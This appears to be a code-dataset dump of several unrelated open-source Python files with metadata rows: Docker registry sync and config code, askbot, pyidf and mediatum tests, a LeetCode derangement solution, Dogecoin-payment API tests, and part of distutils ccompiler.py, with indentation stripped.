host = 'localhost'
username = None
list = [1, 'aaa', 'bbb', 4]
into
{u'username': None, u'host': 'localhost', u'list': [1, 'aaa', 'bbb', 4]}
Cannot use config.items() because I want each value to be
retrieved with g() as above
SOURCE: https://github.com/jpmens/mqttwarn
'''
d = None
if self.has_section(section):
d = dict((key, self.do_get(section, key))
for (key) in self.options(section) if key not in ['targets'])
return d
def eval_cfg(self):
""" eval configuration which overrules the defaults
"""
cfg_file = self._opt.get('--cfg')
if cfg_file is not None:
fd = codecs.open(cfg_file, 'r', encoding='utf-8')
self.readfp(fd)
fd.close()
self.__dict__.update(self.config('defaults'))
def eval_opt(self):
""" Updates cfg according to options """
def handle_logfile(val):
""" transforms logfile argument
"""
if val is None:
logf = os.path.splitext(os.path.basename(__file__))[0]
self.logfile = "%s.log" % logf.lower()
else:
self.logfile = val
self._mapping = {
'--logfile': lambda val: handle_logfile(val),
}
for key, val in self._opt.items():
if key in self._mapping:
if isinstance(self._mapping[key], str):
self.__dict__[self._mapping[key]] = val
else:
self._mapping[key](val)
break
else:
if val is None:
continue
mat = re.match("\-\-(.*)", key)
if mat:
self.__dict__[mat.group(1)] = val
else:
logging.info("Could not find opt<>cfg mapping for '%s'" % key)
def set_logging(self):
""" sets the logging """
self._logger = logging.getLogger()
self._logger.setLevel(logging.DEBUG)
if self.log2stdout:
hdl = logging.StreamHandler()
hdl.setLevel(self.loglevel)
formatter = logging.Formatter(self.logformat)
hdl.setFormatter(formatter)
self._logger.addHandler(hdl)
else:
hdl = logging.FileHandler(self.logfile)
hdl.setLevel(self.loglevel)
formatter = logging.Formatter(self.logformat)
hdl.setFormatter(formatter)
self._logger.addHandler(hdl)
def __str__(self):
""" print human readble """
ret = []
for key, val in self.__dict__.items():
if not re.match("_.*", key):
ret.append("%-15s: %s" % (key, val))
return "\n".join(ret)
def __getitem__(self, item):
""" return item from opt or __dict__
:param item: key to lookup
:return: value of key
"""
if item in self.__dict__.keys():
return self.__dict__[item]
else:
return self._opt[item]
def main():
""" main function """
options = None
if HAVE_DOCOPT:
options = docopt(__doc__, version='0.0.1')
else:
print "No python-docopt found..."
cfg = QnibConfig(options)
if cfg['--local-url'] is None:
local_url = os.environ['DOCKER_HOST'].replace("tcp://", "")
if len(local_url.split(":")) > 1:
local_url = "%s:%s" % (local_url.split(":")[0], cfg['--local-port'])
if cfg['--remote-url'] is None:
print "please specify '--remote-url"
sys.exit(1)
remote_url = "%s:%s" % (cfg['--remote-url'], cfg['--remote-port'])
dreg1 = docker_reg.DockerRegAPI(url=local_url)
dreg1.populate_image_details()
dreg2 = docker_reg.DockerRegAPI(url=remote_url)
dreg2.populate_image_details()
win, lose = dreg1.diff_image_list(dreg2.get_image_details())
print "echo '## pull image from %s and push it to %s...'" % (local_url, remote_url)
for name, tags in win.items():
for tag in tags:
print "echo '%s:%s'" % (name, tag)
dreg1.update_remote_v2_reg(name, tag, remote_url=remote_url)
print "echo 'the remote system has %s images that should be synced as well'" % len(lose)
if __name__ == "__main__":
main()
| apache-2.0 | 7,304,100,943,885,305,000 | 31.537118 | 92 | 0.520064 | false |
divio/askbot-devel | askbot/tests/management_command_tests.py | 1 | 6519 | from django.core import management
from django.contrib import auth
from askbot.tests.utils import AskbotTestCase
from askbot import models
from django.contrib.auth.models import User
class ManagementCommandTests(AskbotTestCase):
def test_add_askbot_user(self):
username = 'test user'
password = 'secretno1'
management.call_command(
'add_askbot_user',
email = '[email protected]',
username = username,
frequency = 'd',
password = password
)
#check that we have the user
users = models.User.objects.filter(username = username)
self.assertEquals(users.count(), 1)
user = users[0]
#check thath subscrptions are correct
subs = models.EmailFeedSetting.objects.filter(
subscriber = user,
)
self.assertEquals(subs.count(), 5)
#try to log in
user = auth.authenticate(username = username, password = password)
self.assertTrue(user is not None)
def test_merge_users(self):
"""Verify a users account can be transfered to another user"""
# Create a new user and add some random related objects
user_one = self.create_user()
question = self.post_question(user=user_one)
comment = self.post_comment(user=user_one, parent_post=question)
number_of_gold = 50
user_one.gold = number_of_gold
reputation = 20
user_one.reputation = reputation
user_one.save()
# Create a second user and transfer all objects from 'user_one' to 'user_two'
user_two = self.create_user(username='unique')
user_two_pk = user_two.pk
management.call_command('merge_users', user_one.id, user_two.id)
# Check that the first user was deleted
self.assertEqual(
models.User.objects.get(pk=user_one.id).status,
'b'
)
# Explicitly check that the values assigned to user_one are now user_two's
self.assertEqual(user_two.posts.get_questions().filter(pk=question.id).count(), 1)
self.assertEqual(user_two.posts.get_comments().filter(pk=comment.id).count(), 1)
user_two = models.User.objects.get(pk=user_two_pk)
self.assertEqual(user_two.gold, number_of_gold)
self.assertEqual(user_two.reputation, reputation)
def test_create_tag_synonym(self):
admin = User.objects.create_superuser('test_admin', '[email protected]', 'admin_pass')
options = {
'from': 'tag1', # ok.. 'from' is a bad keyword argument name..
'to': 'tag2',
'user_id': admin.id,
'is_force': True
}
management.call_command(
'create_tag_synonyms',
**options
)
options['from'] = 'tag3'
options['to'] = 'tag4'
management.call_command(
'create_tag_synonyms',
**options
)
options['from']='tag5'
options['to']='tag4'
management.call_command(
'create_tag_synonyms',
**options
)
options['from']='tag2'
options['to']='tag3'
management.call_command(
'create_tag_synonyms',
**options
)
self.assertEqual(models.TagSynonym.objects.filter(source_tag_name = 'tag1',
target_tag_name = 'tag4'
).count(), 1)
self.assertEqual(models.TagSynonym.objects.filter(source_tag_name = 'tag2',
target_tag_name = 'tag4'
).count(), 1)
self.assertEqual(models.TagSynonym.objects.filter(source_tag_name = 'tag3',
target_tag_name = 'tag4'
).count(), 1)
self.assertEqual(models.TagSynonym.objects.filter(source_tag_name = 'tag5',
target_tag_name = 'tag4'
).count(), 1)
self.assertEqual(models.TagSynonym.objects.count(), 4)
options['from']='tag4'
options['to']='tag6'
management.call_command(
'create_tag_synonyms',
**options
)
self.assertEqual(models.TagSynonym.objects.filter(source_tag_name = 'tag1',
target_tag_name = 'tag6'
).count(), 1)
self.assertEqual(models.TagSynonym.objects.filter(source_tag_name = 'tag2',
target_tag_name = 'tag6'
).count(), 1)
self.assertEqual(models.TagSynonym.objects.filter(source_tag_name = 'tag3',
target_tag_name = 'tag6'
).count(), 1)
self.assertEqual(models.TagSynonym.objects.filter(source_tag_name = 'tag4',
target_tag_name = 'tag6'
).count(), 1)
self.assertEqual(models.TagSynonym.objects.filter(source_tag_name = 'tag5',
target_tag_name = 'tag6'
).count(), 1)
self.assertEqual(models.TagSynonym.objects.count(), 5)
print 'done create_tag_synonym_test'
def test_delete_unused_tags(self):
user = self.create_user()
question = self.post_question(user=user)
tag_count = models.Tag.objects.count()
#create some unused tags
self.create_tag("picasso", user)
self.create_tag("renoir", user)
self.create_tag("pissarro", user)
#check they're in the db
self.assertEqual(models.Tag.objects.count(), tag_count+3)
management.call_command('delete_unused_tags')
#now they should be removed
self.assertEqual(models.Tag.objects.count(), tag_count)
| gpl-3.0 | -6,947,714,562,481,591,000 | 42.172185 | 92 | 0.497162 | false |
rbuffat/pyidf | tests/test_thermalstorageicedetailed.py | 1 | 4659 | import os
import tempfile
import unittest
import logging
from pyidf import ValidationLevel
import pyidf
from pyidf.idf import IDF
from pyidf.water_heaters_and_thermal_storage import ThermalStorageIceDetailed
log = logging.getLogger(__name__)
class TestThermalStorageIceDetailed(unittest.TestCase):
def setUp(self):
self.fd, self.path = tempfile.mkstemp()
def tearDown(self):
os.remove(self.path)
def test_create_thermalstorageicedetailed(self):
pyidf.validation_level = ValidationLevel.error
obj = ThermalStorageIceDetailed()
# alpha
var_name = "Name"
obj.name = var_name
# object-list
var_availability_schedule_name = "object-list|Availability Schedule Name"
obj.availability_schedule_name = var_availability_schedule_name
# real
var_capacity = 3.3
obj.capacity = var_capacity
# node
var_inlet_node_name = "node|Inlet Node Name"
obj.inlet_node_name = var_inlet_node_name
# node
var_outlet_node_name = "node|Outlet Node Name"
obj.outlet_node_name = var_outlet_node_name
# alpha
var_discharging_curve_object_type = "Curve:QuadraticLinear"
obj.discharging_curve_object_type = var_discharging_curve_object_type
# object-list
var_discharging_curve_name = "object-list|Discharging Curve Name"
obj.discharging_curve_name = var_discharging_curve_name
# alpha
var_charging_curve_object_type = "Curve:QuadraticLinear"
obj.charging_curve_object_type = var_charging_curve_object_type
# object-list
var_charging_curve_name = "object-list|Charging Curve Name"
obj.charging_curve_name = var_charging_curve_name
# real
var_timestep_of_the_curve_data = 10.1
obj.timestep_of_the_curve_data = var_timestep_of_the_curve_data
# real
var_parasitic_electric_load_during_discharging = 11.11
obj.parasitic_electric_load_during_discharging = var_parasitic_electric_load_during_discharging
# real
var_parasitic_electric_load_during_charging = 12.12
obj.parasitic_electric_load_during_charging = var_parasitic_electric_load_during_charging
# real
var_tank_loss_coefficient = 13.13
obj.tank_loss_coefficient = var_tank_loss_coefficient
# real
var_freezing_temperature_of_storage_medium = 14.14
obj.freezing_temperature_of_storage_medium = var_freezing_temperature_of_storage_medium
# alpha
var_thaw_process_indicator = "InsideMelt"
obj.thaw_process_indicator = var_thaw_process_indicator
idf = IDF()
idf.add(obj)
idf.save(self.path, check=False)
with open(self.path, mode='r') as f:
for line in f:
log.debug(line.strip())
idf2 = IDF(self.path)
self.assertEqual(idf2.thermalstorageicedetaileds[0].name, var_name)
self.assertEqual(idf2.thermalstorageicedetaileds[0].availability_schedule_name, var_availability_schedule_name)
self.assertAlmostEqual(idf2.thermalstorageicedetaileds[0].capacity, var_capacity)
self.assertEqual(idf2.thermalstorageicedetaileds[0].inlet_node_name, var_inlet_node_name)
self.assertEqual(idf2.thermalstorageicedetaileds[0].outlet_node_name, var_outlet_node_name)
self.assertEqual(idf2.thermalstorageicedetaileds[0].discharging_curve_object_type, var_discharging_curve_object_type)
self.assertEqual(idf2.thermalstorageicedetaileds[0].discharging_curve_name, var_discharging_curve_name)
self.assertEqual(idf2.thermalstorageicedetaileds[0].charging_curve_object_type, var_charging_curve_object_type)
self.assertEqual(idf2.thermalstorageicedetaileds[0].charging_curve_name, var_charging_curve_name)
self.assertAlmostEqual(idf2.thermalstorageicedetaileds[0].timestep_of_the_curve_data, var_timestep_of_the_curve_data)
self.assertAlmostEqual(idf2.thermalstorageicedetaileds[0].parasitic_electric_load_during_discharging, var_parasitic_electric_load_during_discharging)
self.assertAlmostEqual(idf2.thermalstorageicedetaileds[0].parasitic_electric_load_during_charging, var_parasitic_electric_load_during_charging)
self.assertAlmostEqual(idf2.thermalstorageicedetaileds[0].tank_loss_coefficient, var_tank_loss_coefficient)
self.assertAlmostEqual(idf2.thermalstorageicedetaileds[0].freezing_temperature_of_storage_medium, var_freezing_temperature_of_storage_medium)
self.assertEqual(idf2.thermalstorageicedetaileds[0].thaw_process_indicator, var_thaw_process_indicator) | apache-2.0 | 4,151,299,527,143,488,000 | 48.574468 | 157 | 0.711526 | false |
wufangjie/leetcode | 634. Find the Derangement of An Array.py | 1 | 1102 | class Solution(object):
def findDerangement(self, n):
"""
:type n: int
:rtype: int
"""
if n < 2:
return 0
p1, p2 = 1, 2
for i in range(4, n + 1):
if i & 1:
p2 = (i - 1) * (p1 + p2) % 1000000007
else:
p1 = (i - 1) * (p1 + p2) % 1000000007
return p2 if n & 1 else p1
# # NOTE: actually make large dp is costly, only pre two are useful
# dp = [0, 0, 1, 2] + [0] * n
# for i in range(4, n + 1):
# dp[i] = (i - 1) * (dp[i - 1] + dp[i - 2]) % 1000000007
# return dp[n]
# # TLE 45/69
# dp = [0, 0, 1, 2] + [0] * n
# for i in range(4, n + 1):
# p = 1
# for j in range(i - 2, 1, -1):
# p = (p % 1000000007) * (j + 1)
# dp[i] += dp[j] * p
# dp[i] = (dp[i] + (p << 1)) % 1000000007
# return dp[n]
print(Solution().findDerangement(4))
assert Solution().findDerangement(100) == 944828409
print(Solution().findDerangement(1999))
| gpl-3.0 | -2,006,659,796,012,118,800 | 27.25641 | 75 | 0.409256 | false |
mediatum/mediatum | schema/test/test_schema.py | 1 | 1951 | # -*- coding: utf-8 -*-
"""
:copyright: (c) 2014 by the mediaTUM authors
:license: GPL3, see COPYING for details
"""
import schema.schema
from core.test.fixtures import editor_user
def test_filter_masks(content_node_with_mdt):
node = content_node_with_mdt
masks = node.metadatatype.filter_masks().all()
assert len(masks) == 4
def test_filter_masks_language(content_node_with_mdt):
node = content_node_with_mdt
masks = node.metadatatype.filter_masks(language="en").all()
# should get only english masks, no language-independent
assert len(masks) == 2
for mask in masks:
assert mask.language == "en"
def test_filter_masks_language_type(content_node_with_mdt):
node = content_node_with_mdt
masks = node.metadatatype.filter_masks(masktype="testmasktype", language="en").all()
assert len(masks) == 1
assert masks[0]["masktype"] == "testmasktype"
def test_update_node(session, req, schema_init, some_node, simple_mask_with_maskitems, guest_user):
mask = simple_mask_with_maskitems
node = some_node
req.form["testattr"] = u"updated"
req.form["newattr"] = u"new"
req.form["nodename"] = u"new_name"
req.form["system.attr"] = u"sys"
mask.update_node(node, req, guest_user)
assert node["testattr"] == u"updated"
assert node["newattr"] == u"new"
assert node.name == u"new_name"
assert node.system_attrs["attr"] == u"sys"
def test_update_node_check(session, req, schema_init, some_node, simple_mask_with_maskitems, guest_user):
mask = simple_mask_with_maskitems
node = some_node
# initial value
mask.update_node(node, req, guest_user)
node["check"] = "1"
# enabled -> disabled without request value
mask.update_node(node, req, guest_user)
assert node["check"] == "0"
# disabled -> enabled
req.form["check"] = "1"
mask.update_node(node, req, guest_user)
assert node["check"] == "1"
| gpl-3.0 | -1,315,670,322,769,200,000 | 32.067797 | 105 | 0.656586 | false |
smilledge/transient | transient/test/integration/test_api.py | 1 | 2584 | import json
from decimal import Decimal
from dogecoinrpc.data import TransactionInfo
from mock import patch
from transient.test.integration import BaseIntegrationTest
class TestAPI(BaseIntegrationTest):
def test_ping(self):
r = self.client.get("/ping")
self.assertEqual(r.status_code, 200)
self.assertEqual(r.data, "pong")
@patch('transient.services.payments.CoindClient')
def test_post_payment(self, coind_mock):
coind_mock.return_value.is_valid_address.return_value = True
coind_mock.return_value.create_address.return_value = "D5Km7yuVkJnPGWHf2UfvNMxLDwGsMDn9ya"
payload = dict(currency="DOGE", amount="999.999", address="DGMJjZjgdGDmgk21PARUajeUpGNrpq6kph")
r = self.client.post("/payments", content_type="application/json", data=json.dumps(payload))
self.assertEqual(r.status_code, 200)
self.assertTrue(r.json["success"])
payment = r.json["payment"]
response_fields = ["id", "amount_confirmed", "amount_received", "currency", "amount", "payment_address",
"status", "created_at"]
self.assertEqual(payment.keys().sort(), response_fields.sort())
self.assertEqual(payment["amount"], payload["amount"])
self.assertEqual(payment["currency"], payload["currency"])
self.assertEqual(payment["status"], "UNPAID")
@patch('transient.services.transactions.CoindClient')
def test_post_transaction(self, coind_mock):
transaction_id = "ac3b07ac490b76b7d3f845e0593030e48ac44032ba8e3690a4e5f2e09416ed76"
payment_address = "D5Km7yuVkJnPGWHf2UfvNMxLDwGsMDn9ya"
coind_mock.return_value.get_transaction.return_value = TransactionInfo(**{
"txid": transaction_id,
"address": payment_address,
"category": "receive",
"account": "lorem ipsum",
"amount": Decimal("10"),
"fee": 1,
"confirmations": 0
})
payload = dict(currency="DOGE", transaction=transaction_id)
r = self.client.post("/transactions", content_type="application/json", data=json.dumps(payload))
transaction = r.json["transaction"]
self.assertEqual(r.status_code, 200)
self.assertTrue(r.json["success"])
self.assertEqual(transaction["transaction_id"], transaction_id)
self.assertEqual(transaction["amount"], "10")
self.assertEqual(transaction["currency"], payload["currency"])
self.assertEqual(transaction["confirmations"], 0)
self.assertEqual(transaction["fee"], "1")
| mit | -4,155,394,553,245,775,000 | 42.066667 | 112 | 0.662539 | false |
2ndy/RaspIM | usr/lib/python2.6/distutils/ccompiler.py | 1 | 48809 | """distutils.ccompiler
Contains CCompiler, an abstract base class that defines the interface
for the Distutils compiler abstraction model."""
# This module should be kept compatible with Python 2.1.
__revision__ = "$Id$"
import sys, os, re
from types import *
from copy import copy
from distutils.errors import *
from distutils.spawn import spawn
from distutils.file_util import move_file
from distutils.dir_util import mkpath
from distutils.dep_util import newer_pairwise, newer_group
from distutils.util import split_quoted, execute
from distutils import log
class CCompiler:
"""Abstract base class to define the interface that must be implemented
by real compiler classes. Also has some utility methods used by
several compiler classes.
The basic idea behind a compiler abstraction class is that each
instance can be used for all the compile/link steps in building a
single project. Thus, attributes common to all of those compile and
link steps -- include directories, macros to define, libraries to link
against, etc. -- are attributes of the compiler instance. To allow for
variability in how individual files are treated, most of those
attributes may be varied on a per-compilation or per-link basis.
"""
# 'compiler_type' is a class attribute that identifies this class. It
# keeps code that wants to know what kind of compiler it's dealing with
# from having to import all possible compiler classes just to do an
# 'isinstance'. In concrete CCompiler subclasses, 'compiler_type'
# should really, really be one of the keys of the 'compiler_class'
# dictionary (see below -- used by the 'new_compiler()' factory
# function) -- authors of new compiler interface classes are
# responsible for updating 'compiler_class'!
compiler_type = None
# XXX things not handled by this compiler abstraction model:
# * client can't provide additional options for a compiler,
# e.g. warning, optimization, debugging flags. Perhaps this
# should be the domain of concrete compiler abstraction classes
# (UnixCCompiler, MSVCCompiler, etc.) -- or perhaps the base
# class should have methods for the common ones.
# * can't completely override the include or library searchg
# path, ie. no "cc -I -Idir1 -Idir2" or "cc -L -Ldir1 -Ldir2".
# I'm not sure how widely supported this is even by Unix
# compilers, much less on other platforms. And I'm even less
# sure how useful it is; maybe for cross-compiling, but
# support for that is a ways off. (And anyways, cross
# compilers probably have a dedicated binary with the
# right paths compiled in. I hope.)
# * can't do really freaky things with the library list/library
# dirs, e.g. "-Ldir1 -lfoo -Ldir2 -lfoo" to link against
# different versions of libfoo.a in different locations. I
# think this is useless without the ability to null out the
# library search path anyways.
# Subclasses that rely on the standard filename generation methods
# implemented below should override these; see the comment near
# those methods ('object_filenames()' et. al.) for details:
src_extensions = None # list of strings
obj_extension = None # string
static_lib_extension = None
shared_lib_extension = None # string
static_lib_format = None # format string
shared_lib_format = None # prob. same as static_lib_format
exe_extension = None # string
# Default language settings. language_map is used to detect a source
# file or Extension target language, checking source filenames.
# language_order is used to detect the language precedence, when deciding
# what language to use when mixing source types. For example, if some
# extension has two files with ".c" extension, and one with ".cpp", it
# is still linked as c++.
language_map = {".c" : "c",
".cc" : "c++",
".cpp" : "c++",
".cxx" : "c++",
".m" : "objc",
}
language_order = ["c++", "objc", "c"]
def __init__ (self,
verbose=0,
dry_run=0,
force=0):
self.dry_run = dry_run
self.force = force
self.verbose = verbose
# 'output_dir': a common output directory for object, library,
# shared object, and shared library files
self.output_dir = None
# 'macros': a list of macro definitions (or undefinitions). A
# macro definition is a 2-tuple (name, value), where the value is
# either a string or None (no explicit value). A macro
# undefinition is a 1-tuple (name,).
self.macros = []
# 'include_dirs': a list of directories to search for include files
self.include_dirs = []
# 'libraries': a list of libraries to include in any link
# (library names, not filenames: eg. "foo" not "libfoo.a")
self.libraries = []
# 'library_dirs': a list of directories to search for libraries
self.library_dirs = []
# 'runtime_library_dirs': a list of directories to search for
# shared libraries/objects at runtime
self.runtime_library_dirs = []
# 'objects': a list of object files (or similar, such as explicitly
# named library files) to include on any link
self.objects = []
for key in self.executables.keys():
self.set_executable(key, self.executables[key])
# __init__ ()
def set_executables (self, **args):
"""Define the executables (and options for them) that will be run
to perform the various stages of compilation. The exact set of
executables that may be specified here depends on the compiler
class (via the 'executables' class attribute), but most will have:
compiler the C/C++ compiler
linker_so linker used to create shared objects and libraries
linker_exe linker used to create binary executables
archiver static library creator
On platforms with a command-line (Unix, DOS/Windows), each of these
is a string that will be split into executable name and (optional)
list of arguments. (Splitting the string is done similarly to how
Unix shells operate: words are delimited by spaces, but quotes and
backslashes can override this. See
'distutils.util.split_quoted()'.)
"""
# Note that some CCompiler implementation classes will define class
# attributes 'cpp', 'cc', etc. with hard-coded executable names;
# this is appropriate when a compiler class is for exactly one
# compiler/OS combination (eg. MSVCCompiler). Other compiler
# classes (UnixCCompiler, in particular) are driven by information
# discovered at run-time, since there are many different ways to do
# basically the same things with Unix C compilers.
for key in args.keys():
if key not in self.executables:
raise ValueError, \
"unknown executable '%s' for class %s" % \
(key, self.__class__.__name__)
self.set_executable(key, args[key])
# set_executables ()
def set_executable(self, key, value):
if type(value) is StringType:
setattr(self, key, split_quoted(value))
else:
setattr(self, key, value)
def _find_macro (self, name):
i = 0
for defn in self.macros:
if defn[0] == name:
return i
i = i + 1
return None
def _check_macro_definitions (self, definitions):
"""Ensures that every element of 'definitions' is a valid macro
definition, ie. either (name,value) 2-tuple or a (name,) tuple. Do
nothing if all definitions are OK, raise TypeError otherwise.
"""
for defn in definitions:
if not (type (defn) is TupleType and
(len (defn) == 1 or
(len (defn) == 2 and
(type (defn[1]) is StringType or defn[1] is None))) and
type (defn[0]) is StringType):
raise TypeError, \
("invalid macro definition '%s': " % defn) + \
"must be tuple (string,), (string, string), or " + \
"(string, None)"
# -- Bookkeeping methods -------------------------------------------
def define_macro (self, name, value=None):
"""Define a preprocessor macro for all compilations driven by this
compiler object. The optional parameter 'value' should be a
string; if it is not supplied, then the macro will be defined
without an explicit value and the exact outcome depends on the
compiler used (XXX true? does ANSI say anything about this?)
"""
# Delete from the list of macro definitions/undefinitions if
# already there (so that this one will take precedence).
i = self._find_macro (name)
if i is not None:
del self.macros[i]
defn = (name, value)
self.macros.append (defn)
def undefine_macro (self, name):
"""Undefine a preprocessor macro for all compilations driven by
this compiler object. If the same macro is defined by
'define_macro()' and undefined by 'undefine_macro()' the last call
takes precedence (including multiple redefinitions or
undefinitions). If the macro is redefined/undefined on a
per-compilation basis (ie. in the call to 'compile()'), then that
takes precedence.
"""
# Delete from the list of macro definitions/undefinitions if
# already there (so that this one will take precedence).
i = self._find_macro (name)
if i is not None:
del self.macros[i]
undefn = (name,)
self.macros.append (undefn)
def add_include_dir (self, dir):
"""Add 'dir' to the list of directories that will be searched for
header files. The compiler is instructed to search directories in
the order in which they are supplied by successive calls to
'add_include_dir()'.
"""
self.include_dirs.append (dir)
def set_include_dirs (self, dirs):
"""Set the list of directories that will be searched to 'dirs' (a
list of strings). Overrides any preceding calls to
'add_include_dir()'; subsequence calls to 'add_include_dir()' add
to the list passed to 'set_include_dirs()'. This does not affect
any list of standard include directories that the compiler may
search by default.
"""
self.include_dirs = copy (dirs)
def add_library (self, libname):
"""Add 'libname' to the list of libraries that will be included in
all links driven by this compiler object. Note that 'libname'
should *not* be the name of a file containing a library, but the
name of the library itself: the actual filename will be inferred by
the linker, the compiler, or the compiler class (depending on the
platform).
The linker will be instructed to link against libraries in the
order they were supplied to 'add_library()' and/or
'set_libraries()'. It is perfectly valid to duplicate library
names; the linker will be instructed to link against libraries as
many times as they are mentioned.
"""
self.libraries.append (libname)
def set_libraries (self, libnames):
"""Set the list of libraries to be included in all links driven by
this compiler object to 'libnames' (a list of strings). This does
not affect any standard system libraries that the linker may
include by default.
"""
self.libraries = copy (libnames)
def add_library_dir (self, dir):
"""Add 'dir' to the list of directories that will be searched for
libraries specified to 'add_library()' and 'set_libraries()'. The
linker will be instructed to search for libraries in the order they
are supplied to 'add_library_dir()' and/or 'set_library_dirs()'.
"""
self.library_dirs.append (dir)
def set_library_dirs (self, dirs):
"""Set the list of library search directories to 'dirs' (a list of
strings). This does not affect any standard library search path
that the linker may search by default.
"""
self.library_dirs = copy (dirs)
def add_runtime_library_dir (self, dir):
"""Add 'dir' to the list of directories that will be searched for
shared libraries at runtime.
"""
self.runtime_library_dirs.append (dir)
def set_runtime_library_dirs (self, dirs):
"""Set the list of directories to search for shared libraries at
runtime to 'dirs' (a list of strings). This does not affect any
standard search path that the runtime linker may search by
default.
"""
self.runtime_library_dirs = copy (dirs)
def add_link_object (self, object):
"""Add 'object' to the list of object files (or analogues, such as
explicitly named library files or the output of "resource
compilers") to be included in every link driven by this compiler
object.
"""
self.objects.append (object)
def set_link_objects (self, objects):
"""Set the list of object files (or analogues) to be included in
every link to 'objects'. This does not affect any standard object
files that the linker may include by default (such as system
libraries).
"""
self.objects = copy (objects)
# -- Private utility methods --------------------------------------
# (here for the convenience of subclasses)
# Helper method to prep compiler in subclass compile() methods
def _setup_compile(self, outdir, macros, incdirs, sources, depends,
extra):
"""Process arguments and decide which source files to compile."""
if outdir is None:
outdir = self.output_dir
elif type(outdir) is not StringType:
raise TypeError, "'output_dir' must be a string or None"
if macros is None:
macros = self.macros
elif type(macros) is ListType:
macros = macros + (self.macros or [])
else:
raise TypeError, "'macros' (if supplied) must be a list of tuples"
if incdirs is None:
incdirs = self.include_dirs
elif type(incdirs) in (ListType, TupleType):
incdirs = list(incdirs) + (self.include_dirs or [])
else:
raise TypeError, \
"'include_dirs' (if supplied) must be a list of strings"
if extra is None:
extra = []
# Get the list of expected output (object) files
objects = self.object_filenames(sources,
strip_dir=0,
output_dir=outdir)
assert len(objects) == len(sources)
pp_opts = gen_preprocess_options(macros, incdirs)
build = {}
for i in range(len(sources)):
src = sources[i]
obj = objects[i]
ext = os.path.splitext(src)[1]
self.mkpath(os.path.dirname(obj))
build[obj] = (src, ext)
return macros, objects, extra, pp_opts, build
def _get_cc_args(self, pp_opts, debug, before):
# works for unixccompiler, emxccompiler, cygwinccompiler
cc_args = pp_opts + ['-c']
if debug:
cc_args[:0] = ['-g']
if before:
cc_args[:0] = before
return cc_args
def _fix_compile_args (self, output_dir, macros, include_dirs):
"""Typecheck and fix-up some of the arguments to the 'compile()'
method, and return fixed-up values. Specifically: if 'output_dir'
is None, replaces it with 'self.output_dir'; ensures that 'macros'
is a list, and augments it with 'self.macros'; ensures that
'include_dirs' is a list, and augments it with 'self.include_dirs'.
Guarantees that the returned values are of the correct type,
i.e. for 'output_dir' either string or None, and for 'macros' and
'include_dirs' either list or None.
"""
if output_dir is None:
output_dir = self.output_dir
elif type (output_dir) is not StringType:
raise TypeError, "'output_dir' must be a string or None"
if macros is None:
macros = self.macros
elif type (macros) is ListType:
macros = macros + (self.macros or [])
else:
raise TypeError, "'macros' (if supplied) must be a list of tuples"
if include_dirs is None:
include_dirs = self.include_dirs
elif type (include_dirs) in (ListType, TupleType):
include_dirs = list (include_dirs) + (self.include_dirs or [])
else:
raise TypeError, \
"'include_dirs' (if supplied) must be a list of strings"
return output_dir, macros, include_dirs
# _fix_compile_args ()
def _prep_compile(self, sources, output_dir, depends=None):
"""Decide which souce files must be recompiled.
Determine the list of object files corresponding to 'sources',
and figure out which ones really need to be recompiled.
Return a list of all object files and a dictionary telling
which source files can be skipped.
"""
# Get the list of expected output (object) files
objects = self.object_filenames(sources, output_dir=output_dir)
assert len(objects) == len(sources)
# Return an empty dict for the "which source files can be skipped"
# return value to preserve API compatibility.
return objects, {}
def _fix_object_args (self, objects, output_dir):
"""Typecheck and fix up some arguments supplied to various methods.
Specifically: ensure that 'objects' is a list; if output_dir is
None, replace with self.output_dir. Return fixed versions of
'objects' and 'output_dir'.
"""
if type (objects) not in (ListType, TupleType):
raise TypeError, \
"'objects' must be a list or tuple of strings"
objects = list (objects)
if output_dir is None:
output_dir = self.output_dir
elif type (output_dir) is not StringType:
raise TypeError, "'output_dir' must be a string or None"
return (objects, output_dir)
def _fix_lib_args (self, libraries, library_dirs, runtime_library_dirs):
"""Typecheck and fix up some of the arguments supplied to the
'link_*' methods. Specifically: ensure that all arguments are
lists, and augment them with their permanent versions
(eg. 'self.libraries' augments 'libraries'). Return a tuple with
fixed versions of all arguments.
"""
if libraries is None:
libraries = self.libraries
elif type (libraries) in (ListType, TupleType):
libraries = list (libraries) + (self.libraries or [])
else:
raise TypeError, \
"'libraries' (if supplied) must be a list of strings"
if library_dirs is None:
library_dirs = self.library_dirs
elif type (library_dirs) in (ListType, TupleType):
library_dirs = list (library_dirs) + (self.library_dirs or [])
else:
raise TypeError, \
"'library_dirs' (if supplied) must be a list of strings"
if runtime_library_dirs is None:
runtime_library_dirs = self.runtime_library_dirs
elif type (runtime_library_dirs) in (ListType, TupleType):
runtime_library_dirs = (list (runtime_library_dirs) +
(self.runtime_library_dirs or []))
else:
raise TypeError, \
"'runtime_library_dirs' (if supplied) " + \
"must be a list of strings"
return (libraries, library_dirs, runtime_library_dirs)
# _fix_lib_args ()
def _need_link (self, objects, output_file):
"""Return true if we need to relink the files listed in 'objects'
to recreate 'output_file'.
"""
if self.force:
return 1
else:
if self.dry_run:
newer = newer_group (objects, output_file, missing='newer')
else:
newer = newer_group (objects, output_file)
return newer
# _need_link ()
def detect_language (self, sources):
"""Detect the language of a given file, or list of files. Uses
language_map, and language_order to do the job.
"""
if type(sources) is not ListType:
sources = [sources]
lang = None
index = len(self.language_order)
for source in sources:
base, ext = os.path.splitext(source)
extlang = self.language_map.get(ext)
try:
extindex = self.language_order.index(extlang)
if extindex < index:
lang = extlang
index = extindex
except ValueError:
pass
return lang
# detect_language ()
# -- Worker methods ------------------------------------------------
# (must be implemented by subclasses)
def preprocess (self,
source,
output_file=None,
macros=None,
include_dirs=None,
extra_preargs=None,
extra_postargs=None):
"""Preprocess a single C/C++ source file, named in 'source'.
Output will be written to file named 'output_file', or stdout if
'output_file' not supplied. 'macros' is a list of macro
definitions as for 'compile()', which will augment the macros set
with 'define_macro()' and 'undefine_macro()'. 'include_dirs' is a
list of directory names that will be added to the default list.
Raises PreprocessError on failure.
"""
pass
def compile(self, sources, output_dir=None, macros=None,
include_dirs=None, debug=0, extra_preargs=None,
extra_postargs=None, depends=None):
"""Compile one or more source files.
'sources' must be a list of filenames, most likely C/C++
files, but in reality anything that can be handled by a
particular compiler and compiler class (eg. MSVCCompiler can
handle resource files in 'sources'). Return a list of object
filenames, one per source filename in 'sources'. Depending on
the implementation, not all source files will necessarily be
compiled, but all corresponding object filenames will be
returned.
If 'output_dir' is given, object files will be put under it, while
retaining their original path component. That is, "foo/bar.c"
normally compiles to "foo/bar.o" (for a Unix implementation); if
'output_dir' is "build", then it would compile to
